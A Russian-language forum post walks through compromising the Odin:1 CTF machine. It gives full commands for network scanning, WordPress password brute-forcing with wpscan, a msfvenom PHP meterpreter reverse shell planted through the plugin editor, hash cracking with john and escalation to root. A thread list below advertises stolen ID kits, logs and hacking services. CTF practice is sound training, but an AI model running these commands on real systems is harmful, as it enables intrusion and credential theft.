Солевой генний или как пройти CTF Odin: 1

A

AngelXXXanax

Original poster
И так... Посидел, поймал солевой трип и стал солевым гением. Так что сегодня вы будете читать статью о прохождении CTF Odin:1.



Незабываем добавить его в /etc/hosts



Так как он ставиться на VM, VB нам прийдется проскинть нашу сеть, чтобы найти IP. Для этого мы будем использовать утилиту под название arp-scan. Для этого мы пишем:



sudo arp-scan -l

e491359e1c4a738950ed6.png

IP машину у меня 192.168.1.6

Давайте теперь просканим открытые порты и посмотрим что там у нас такое интересное. Для этого мы будем использовать утилиту nmap > Ключ: sudo nmap -sS -Pn -n -p- -vvv -T4 192.168.1.6



c0687665d5d2ef2d5f5f3.png



Как мы можем видеть у нас есть открытый порт 80. Это значит что мы можем перейти по этому IP и попасть на сайт. Если это сделать - то мы увидим это:

e7dcc258f5f2dace2176d.png

Верно! Это говно какое-то) Если немного полазить по сайту мы можем понять что он на движке wordpress. Так что давайте зайдем на точку входа в админ панель.

3ceaa18a30d3b0d2bf52a.png

Окей. На данный момент у нас все весьма хорошо! Так что давайте попробуем сбрутить админ пароль с помощью wpscan.



Для этого мы напишем:

wpscan --url

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

--usernames admin --passwords путь на ваш словарь для брута

Теперь нам осталось недолго подождать когда подберет нужный нам пароль. И как мы видим он смог подобрать нужный нам пароль:

37d3c1c3023d47608eaf8.png



Пробуем зайти в админ-панель:

dee29bd0751a95a5f2997.png

Как мы видим у нас все получилось! Но нам нужно как-то попасть на сервер и получить флаг... Так что можно попробовать загрузить шелл на сайт! Для этого жмем plugins > plugin editor:

a6b49fd00042f4d702d86.png

Теперь давайте будем использовать msfvenom, чтобы создать наш шелл. Для этого пишем:

msfvenom -p php/meterpreter/reverse_tcp lhost=ваш IP lport=4444 R

ab764c8c307e6794b72e3.png

Теперь копируем и кидаем в плагины:

06626259090d8a360d325.png

Теперь запускаем наш msfconsole и пишем:

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost ваш IP
set lport 4444
exploit



Теперь загружаем шелл и переходим по пути:


Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.




P.S это в моем случае так как я выбрал другой плагин)



И как мы можем видеть мы получили meterpreter сессию. Теперь пишем shell, после чего пишем

python3 -c "import pty;pty.spawn('/bin/bash')"



88840cb4cad8805c45836.png

Как мы можем видеть у нас появился нормальный рабочий шелл. Давайте теперь немного полазим по файлам. Как мы видим я перешел на этот путь и нашел файл wp-config.php

12e529a20235515433aa0.png

Давайте теперь напишем: cat wp-config.php

После чего мы сразу увидим такой странный ключ:

f5b165e072da409ad4f43.png

Он и есть нашим паролем для входа в рут! Но нам ещё нужно взломать его. Для этого просто копируем его и сохраняем "В моем случае файл называться crack.txt". Теперь пишем:

john --wordlist=/usr/share/john/password.lst путь к файлу/crack.txt

5c4bea1c15db2d249fcc1.png

Как мы видим пароль нашелся! "jasmine". Теперь давайте попробуем зайти. Просто пишем: su root:

ea3f7a9c4f12cef556e8d.png



Теперь переходим в директорию root. Пишем cat bjorn:

339f40cf2d85858047d8e.png

Вот и все! Мы прошли машину.
 
  • Like
Реакции: Admin и 9779
Y

Yetawesdev

Original poster
Нихуёво, давненько уже не практиковался в CTF, автор солевой гений)
 
Название темы
Автор Заголовок Раздел Ответы Дата
Support81 LockBit или DragonForce? Кибератака на Палау привела IT-специалистов в замешательство Новости в сети 0
Support81 Разведка за кадром, или Аквариум спецслужб Новости в сети 0
Support81 SiCat: революция в поиске эксплойтов или новый инструмент хакеров? Новости в сети 0
Support81 Взлом или небрежность? Код и пароли Binance были доступны на GitHub в течение нескольких месяцев Новости в сети 0
Support81 ТикТок обретает вторую жизнь в России: сбой или новая стратегия? Новости в сети 0
TrashHellSoDomy Интересно Такие точные сведения.. или команды.? Свободное общение и флейм 0
Support81 Важно!!! Создаем свой VPN с защищенным от блокировок протоколом AmneziaWG, или WireGuard на максималках Анонимность и приватность 3
Support81 Обычный новый подписчик или полицейский в гражданском? Новости в сети 0
Support81 UNC4841 — настоящие спецагенты или просто хакеры высокого класса? Новости в сети 0
Support81 Договор ООН о киберпреступности: новые стандарты или орудие репрессий? Новости в сети 0
Support81 Monti и Conti: новая звездная пара в мире кибервымогательств или просто совпадение? Новости в сети 0
Support81 Шифровальщик Wagner: вымогательство, вербовка или пустой звук? Новости в сети 0
Support81 70 миллионов или 10 терабайт информации: чем обернется взлом TSMC для мира микросхем? Новости в сети 0
O Я ищу работу. Мошенничество/афера, денежные мулы или другой бизнес в Турции Ищу работу. Предлагаю свои услуги. 3
P Закрыто Я могу выступить посредником по сделке между моими американцами и вами по покупке чистых или заюзанных доков. Корзина 1
websprojekt Продам Крипто биржа | Crypto exchange для ТТ тимы или индивидуального использования Куплю/Продам 2
olivander Продам ПРОДАЖА или ОТРАБОТКА APIKEY/SECRETKEY + скрипт Автовывода приватников Финансы - биллинги, банки, кошельки, логи 1
Protectron Нужна консультация действующего(предпочтительнее) или бывшего банковского работника Ищу работу. Предлагаю свои услуги. 0
M На проверке Заказать Комментарии - Отзывы в Telegram Канал или Чат Ищу работу. Предлагаю свои услуги. 2
V Куплю Ищу ТОО или ИП Казахстан Куплю/Продам 1
D Как поставить лайк? или убрать хайд? может ли не показываться кнопка лайка? Вопросы и интересы 7
P Закрыто Продаю юзанные комплекты(права,айди карты с двух сторон) по Сша без селфи или с селфи Корзина 2
M Германия.В продаже юзанные комплекты вместе с селфи или без селфи(смотрите видео доказательство). Корзина 0
M В продаже юзанные украинские айди карты с двух сторон с селфи или без селфи+прописка(смотрите видео доказательство). Корзина 0
M В продаже юзанные рф комплекты вместе с селфи или без селфи(смотрите видео доказательство). Корзина 0
Z Мне нужно купить веб -оболочку или cpanel Корзина 1
Deni4ka Закрыто Брут акки или акки с токенами от Chaturbate Корзина 2
V Куплю Ищу ТОО или ИП Казахстан Куплю/Продам 1
F Подарок акция до 20000 руб. или месяц бесплатно. Тинькофф Инвестиции. Другое 0
wallet_dat Ожидает оплаты Утерянный или забытый пароль кошельков Bitcoin core Куплю/Продам 111
B Интересно можно ли брутфорсить инстаграм или гмейл в 2022 ? Куплю/Продам 0
DIPHENY Нужен человек с банком Левобережный или Faktura Предоставляю работу. Ищу специалиста. 0
J Мобильные LTE прокси или анонимные ipv4: преимущества и недостатки каждого типа прокси SSH / дедики / Vpn / Proxy / Socks 21
F Партнерка «Секс по телефону по предоплате» или «обратный звонок» Способы заработка 1
M Куплю Куплю или залью симкарты Тинькофф Мобайл. Куплю/Продам 2
S Коронавирус - реальная угроза или манипуляции? Свободное общение и флейм 4
mickey7091 Даю разовые или постоянные работы отрисовщикам(общий бюджет 500 долларов-смотрите видео доказательство). Предоставляю работу. Ищу специалиста. 4
slovokek Куплю Скуплю или отработаю логи БА ЮСА! Куплю/Продам 0
slovokek ищу трафферов фб или гугл Предоставляю работу. Ищу специалиста. 0
C Куплю Реализую ваши аккаунты с почтой у себя в интернет магазине. Гарантия ~10 дней или верну аккаунт Куплю/Продам 0
Р Интересно Способ вывода с Binance и других бирж без верификации по СМС или 2FA Способы заработка 0
S Услуги Хакера Заказать Whatsapp,Viber,Telegram,Vk Связь с нами - [email protected] Всем Добрый день Интересует услуга взлома вашего Врага или же Корзина 0
9 Интересно XSS, или как получить халявные cookie Ч1. Уязвимости и взлом 15
I Emacs VM или termux для программирования Свободное общение и флейм 0
9 Интересно MST-или деанон через ссылку. Полезные статьи 12
A Куплю Куплю dating отклик и базы email adult или dating направленности Куплю/Продам 1
S Дурак или Умный. Кому жить проще? Свободное общение и флейм 4
V Андрей Комбат «Начало пути или заработай в сети» 2.0 Способы заработка 2
A Куплю Куплю свои запросы в ваших новых и/или отработанных USA логах Куплю/Продам 1
R Продам Пластиковые карты Qiwi | ЮMoney, отправка СДЭК или фото пластика Финансы - биллинги, банки, кошельки, логи 0

Название темы